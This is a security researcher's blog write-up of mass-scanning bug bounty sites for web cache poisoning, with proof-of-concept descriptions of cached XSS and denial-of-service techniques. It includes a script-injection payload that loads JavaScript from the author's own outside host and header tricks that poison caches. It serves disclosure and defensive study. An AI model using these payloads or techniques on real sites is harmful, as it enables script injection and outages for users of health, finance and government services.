403 Help is Forbidden - Web Cache Poisoning in the Wild

TLDR

Wrote a Web Cache Poisoning scanner tailored for mass scanning that features all the web cache poisoning techniques I know of. Ran it against bug bounties. Found high hundreds of Cache Poisoned Denial of Service instances (affecting e.g. popular SaaS products, financial and health websites, as well as European governmental websites) as well as two Cached Reflected XSS (= Stored XSS). Cache Poisoned Denial of Service didn’t generate much interest, but XSS earned me good money.

Prolog

In 2021, I chose web cache poisoning as the topic for my bachelor’s thesis. I chose it because of the excellent papers Practical Web Cache Poisoning (2018, James Kettle), Your Cache Has Fallen: Cache-Poisoned Denial-of-Service Attack (2019, Hoai Viet Nguyen, Luigi Lo Iacono, and Hannes Federrath), and Web Cache Entanglement: Novel Pathways to Poisoning (2020, James Kettle). I gathered all the known web cache poisoning techniques, sorted them into categories, and bundled them into a scanner: the Web Cache Vulnerability Scanner (WCVS). Additionally, I scanned 51 of the top 1000 websites for web cache poisoning. However, the results weren’t that great. There were too many false positives, and only 11 instances of non-malicious cached content injections.

Nevertheless, throughout the years, I maintained the scanner, fixing bugs and adding and improving techniques. The positive feedback was motivating, and a few bug bounty hunters thanked me for helping them earn good money using the scanner. Every once in a while, I thought about running the scanner against some bug bounties again. This finally led me to my next spare-time project: Improving the scanner and running it against bug bounties!

Automation is Key

Because of my time constraints, I needed to make the process as efficient as possible. Thus, I created scripts for the following:

- Download a huge list of bug bounty subdomains from Chaos by Project Discovery. In fact, there were over 10 million subdomains!

- Run httpx (20 instances in parallel) to deduplicate the subdomains and remove the inactive ones, decreasing the number of targets to 56,000.

- Run WCVS (35 instances in parallel) over them. With all of that automated, I only had to manually review the JSON reports generated by WCVS.
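The fan-out step above can be sketched roughly as follows. This is an illustrative Python sketch and not the scripts I actually used; the function name `shard_targets` and the example hostnames are hypothetical. It deduplicates a target list and splits it into one shard per parallel scanner instance.

```python
def shard_targets(targets, instances):
    """Deduplicate hostnames and split them into `instances` shards."""
    # Normalize, drop empty lines, and deduplicate while preserving order.
    unique = list(dict.fromkeys(t.strip().lower() for t in targets if t.strip()))
    # Round-robin split so every shard gets a similar number of targets.
    return [unique[i::instances] for i in range(instances)]


# Hypothetical input; the real list came from Chaos.
raw = ["a.example", "A.example ", "b.example", "", "c.example"]
shards = shard_targets(raw, 2)
print(shards)
```

Each shard could then be written to its own file and handed to one scanner process.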

Results

WCVS identified:

- over 600 independent instances of DoS (independent = counting cloud products, such as SaaS and PaaS, only once)

- over 200 independent instances of reflected and cached content injections

- two of these were reflected XSS, which get escalated to stored XSS due to caching

The vulnerable web apps were:

- Helpcenter SaaS solutions (if you search for a company’s helpcenter, chances are high they are using one of these :) )

- CRM SaaS solutions, App PaaS solutions, Cloud Storages

- European Governments

- (Food) Delivery Services, Car-Sharing Services

- Financial and Health (e.g. doctor appointment scheduling) web applications

- and many more…

Now, let’s move on to the fun stuff: some PoCs :)



XSS via Parameter Pollution

Here we have a blog which reflects the query string. The query string gets JSON encoded but is embedded into an HTML attribute context, which enables XSS. Using the payload "><script/src=https://kirlia.de/xss.js></script> we can load and execute arbitrary JavaScript files.





All parameters are included in the cache key, but only their first occurrence. However, the web app takes the last occurrence. This discrepancy can be exploited. For example, you can choose a common parameter, such as utm_source=google.com, and then add utm_source=PAYLOAD.

If you then request the page a second time with only the first benign value, you will receive a cached response.

However, this cached response has the XSS payload embedded :)


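To make the discrepancy concrete, here is a minimal Python model of it. It is a toy under stated assumptions, not the real cache or blog: `cache_key` and `app_params` are hypothetical helpers, and `blog.example` is a placeholder host. The cache keys on the first occurrence of each parameter, while the app reads the last one.

```python
from urllib.parse import parse_qsl, urlsplit


def cache_key(url: str) -> tuple:
    """Toy cache key: path plus the FIRST value seen for each parameter."""
    parts = urlsplit(url)
    first_values = {}
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        first_values.setdefault(name, value)  # later duplicates are ignored
    return (parts.path, tuple(sorted(first_values.items())))


def app_params(url: str) -> dict:
    """Toy application view: the LAST value of each parameter wins."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


benign = "https://blog.example/post?utm_source=google.com"
poisoned = benign + "&utm_source=PAYLOAD"

# Both URLs map to the same cache entry ...
print(cache_key(benign) == cache_key(poisoned))
# ... but the app reflects the attacker-controlled value.
print(app_params(poisoned)["utm_source"])
```

Because both requests share a key, the response generated for the polluted request is what later visitors of the benign URL receive.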

XSS due to Open Redirect via X-Forwarded-Host

Here, the webapp tries to load a JavaScript file, resulting in a 302 redirect. However, the target host of the redirect can be modified via the X-Forwarded-Host header. Further, this header is not included in the cache key! Thus we can use X-Forwarded-Host: www.kirlia.de to let the webapp load our JavaScript file at https://www.kirlia.de/agent-app/login.


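The role of the unkeyed header can be illustrated with a small Python model. This is a sketch under assumptions, not the target's actual behavior: `origin`, `ToyCache`, and the host `app.example` are made up for illustration. The cache keys only on Host and path, so a redirect built from X-Forwarded-Host is served to everyone.

```python
def origin(path: str, headers: dict) -> tuple:
    """Toy origin: builds the redirect target from the host it believes it has."""
    host = headers.get("X-Forwarded-Host", headers["Host"])
    return (302, f"https://{host}{path}")


class ToyCache:
    """Caches by (Host, path) only; X-Forwarded-Host is NOT part of the key."""

    def __init__(self):
        self.store = {}

    def fetch(self, path: str, headers: dict) -> tuple:
        key = (headers["Host"], path)
        if key not in self.store:
            self.store[key] = origin(path, headers)  # cache miss: ask the origin
        return self.store[key]


cache = ToyCache()
# The attacker's request poisons the cache entry.
cache.fetch("/agent-app/login",
            {"Host": "app.example", "X-Forwarded-Host": "www.kirlia.de"})
# A victim request without the header receives the poisoned redirect.
victim = cache.fetch("/agent-app/login", {"Host": "app.example"})
print(victim)
```

Adding the header to the cache key, or ignoring it at the origin, would break this chain in the model.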

DOS via X-Forwarded-Scheme

Setting the X-Forwarded-Scheme header to http makes the webapp believe the request arrived over plain HTTP, so it redirects to https.

This redirect gets cached, leading to an infinite redirect loop, because https://example.com/ redirects to https://example.com/. This is a fairly common problem with Cloudflare.


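A cached response of this kind can be recognized by checking whether a redirect points back at the URL that was requested. The following Python helper is a rough sketch of that check; the name `is_redirect_loop` is hypothetical, and I am not claiming this is how WCVS detects it.

```python
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = (301, 302, 303, 307, 308)


def is_redirect_loop(requested_url: str, status: int, location: str) -> bool:
    """Return True if the response redirects to the URL that was requested."""
    if status not in REDIRECT_CODES or not location:
        return False
    # Resolve relative Location values against the requested URL.
    target = urlsplit(urljoin(requested_url, location))
    source = urlsplit(requested_url)

    def normalize(parts):
        # Treat an empty path as "/" and compare hosts case-insensitively.
        return (parts.scheme, parts.netloc.lower(), parts.path or "/", parts.query)

    return normalize(source) == normalize(target)


print(is_redirect_loop("https://example.com/", 301, "https://example.com/"))
print(is_redirect_loop("http://example.com/", 301, "https://example.com/"))
```

The first call models the poisoned case, the second the legitimate http-to-https upgrade.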

DOS via Range

The Range header contains an invalid byte range, leading to a 416 error that gets cached.

DOS via XSS Payload

A header contains an XSS payload, leading to a 403 Forbidden, which gets cached.



DOS via X-Amz-Website-Redirect-Location (AWS specific)

The X-Amz-Website-Redirect-Location header is AWS specific. An invalid value may lead to an error message, which gets cached.



DOS via too large Header Fields (HHO)

If the cache can support a larger header field than the web server, it may forward requests with large header fields to the web server. The web server will return an error, which will be cached.


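The size gap can be sketched in Python as follows. The limits used here are hypothetical example values, `hho_header` and the header name `X-Oversized-Header` are made up for illustration, and header size is modeled simply as name length plus value length, which real servers count differently.

```python
from typing import Optional


def hho_header(cache_limit: int, origin_limit: int,
               name: str = "X-Oversized-Header") -> Optional[dict]:
    """Build a header that fits the cache's limit but exceeds the origin's.

    Size is modeled as len(name) + len(value); treat the numbers as
    illustrative only.
    """
    if cache_limit <= origin_limit:
        return None  # no gap between the two limits, nothing to exploit
    value_len = origin_limit + 1 - len(name)  # one byte over the origin limit
    if value_len < 1:
        return None  # limit is smaller than the header name itself
    return {name: "a" * value_len}


# Hypothetical limits: the cache accepts 20 KiB, the origin only 8 KiB.
header = hho_header(cache_limit=20_480, origin_limit=8_192)
size = sum(len(k) + len(v) for k, v in header.items())
print(size)
```

In the model, any size strictly above the origin limit and at most the cache limit passes the cache and triggers the origin's error.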

DOS via X-Rewrite-URL (Craft CMS specific)

X-Rewrite-URL can be used with Craft CMS to request a different path than the one specified in the first line of the request. Specifying a non-existent path leads to a 404, while specifying a path that suffers from an open redirect may even lead to a cached open redirect.



DOS via X-Middleware-Prefetch (Next.js specific)

X-Middleware-Prefetch: 1 is a Next.js specific quirk which leads to a response containing only {} in its body. Thus we have a DoS with a 200 status code, which tends to get cached way longer than error status codes.



DOS via RSC (Next.js specific, again)

Rsc: 1 is another Next.js specific quirk which leads to the webserver not returning an HTML response, but a React fragment. Once again, a DoS with a 200 status code.

Further DoS Techniques

There were many other successful DoS techniques, such as metachars in header names, malformed headers, and invalid header values. However, I think those were enough PoCs!

Conclusion

My spare-time project revealed that web cache poisoning is still a significant issue.

- Caching proxies and/or web servers do not fully comply with RFCs, so they may interpret parts of requests differently.

- State-changing parts of the request are not included in the cache key. Those configuring the cache need deep knowledge of the web frameworks/libraries used, their quirks, and the functionality of the web application. Most of the time, this will not be the case.

- Complexity kills. Some websites have more than one cache in front of them. One website even had five. Well, they are probably all configured the same and tailored to the website, right? RIGHT?

I was not surprised that I did not find many instances of XSS. First, a reflected XSS must exist in an unauthenticated part of the web application and must not yet have been identified and fixed. Second, the parameters causing the reflected XSS must be poisonable; otherwise, WCVS does not report them. Third, due to the large number of targets, I ran WCVS with limited capabilities (e.g., wordlists with only ~20 entries instead of the default thousands) to speed up the process significantly. Nevertheless, the hundreds of reports that turned out, after investigation, to be non-malicious input reflections show that WCVS can detect reflections that could lead to XSS when user input is not handled properly. (WCVS only checks for cached reflections of unkeyed input and does not evaluate whether they can be exploited. That is up to the creativity and context-awareness of humans or specialized content injection scanners.)

However, I was astonished by the huge number of exploitable cache poisoned denial of service instances. I tested responsibly with cache busters to avoid interfering with benign users. However, exploiting many of the found DoS vulnerabilities would render many widely popular SaaS and PaaS products inaccessible. Even more critical are the DoS vulnerabilities in the health (Want to book a doctor’s appointment? Nope, 403.) and financial (Want to look at your funds? Hmm sorry 412.) sectors. Sadly, though, DoS is out of scope for most bug bounty programs. I reported many anyway, not expecting a bounty, but hoping for thankfulness and fixes. However, I was ghosted, or they said “no impact” (well, if your website is unavailable for 30+ minutes after being poisoned, and poisoning can be repeated every 30+ minutes… I guess availability is not business critical for you then?). Hence, after some time, I stopped looking for DoS and only looked for content reflection in the hope of finding XSS or an open redirect. The independent instances of DoS (counting cloud products, such as SaaS and PaaS, only once) were over 600. So, if you visit a website and receive an error response (or even a strange 200 OK response, looking at you, Next.js), check to see if you have a cached response!
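For readers unfamiliar with cache busters: the idea is to add a unique, otherwise meaningless query parameter so that a test request gets its own cache entry and regular visitors never see the poisoned response. A minimal Python sketch, assuming the query string is part of the cache key (the function name `add_cache_buster` and the parameter name `cb` are arbitrary choices for illustration):

```python
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def add_cache_buster(url: str, param: str = "cb") -> str:
    """Append a random query parameter so the request gets its own cache entry."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.append((param, secrets.token_hex(8)))  # 16 random hex characters
    return urlunsplit(parts._replace(query=urlencode(query)))


busted = add_cache_buster("https://example.com/page?lang=en")
print(busted)
```

If the cache ignores the query string entirely, this offers no protection, so that assumption has to be verified per target before testing.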

I improved my automation so that it looks for new subdomains every day using Chaos and scans them with WCVS. I would like to add one more automation: a notification when a report contains content reflection. Then, I would only need to look at a JSON report if I received a notification. I will not further investigate Cache Poisoned Denial of Service. Technically, it really excites me, and there is still a lot to explore and new techniques to invent. However, the lack of appreciation I received for the instances I reported was not worth the time I invested.

Throughout the project, I made many improvements to WCVS, which will be released in version 2.0 soon [Edit: version 2.0 is released!]. This even resulted in a complete overhaul of the network logic to enable sending requests that violate RFCs, which is not possible with the default Golang net library :) If you know of any web cache poisoning techniques that haven’t been implemented yet, let me know.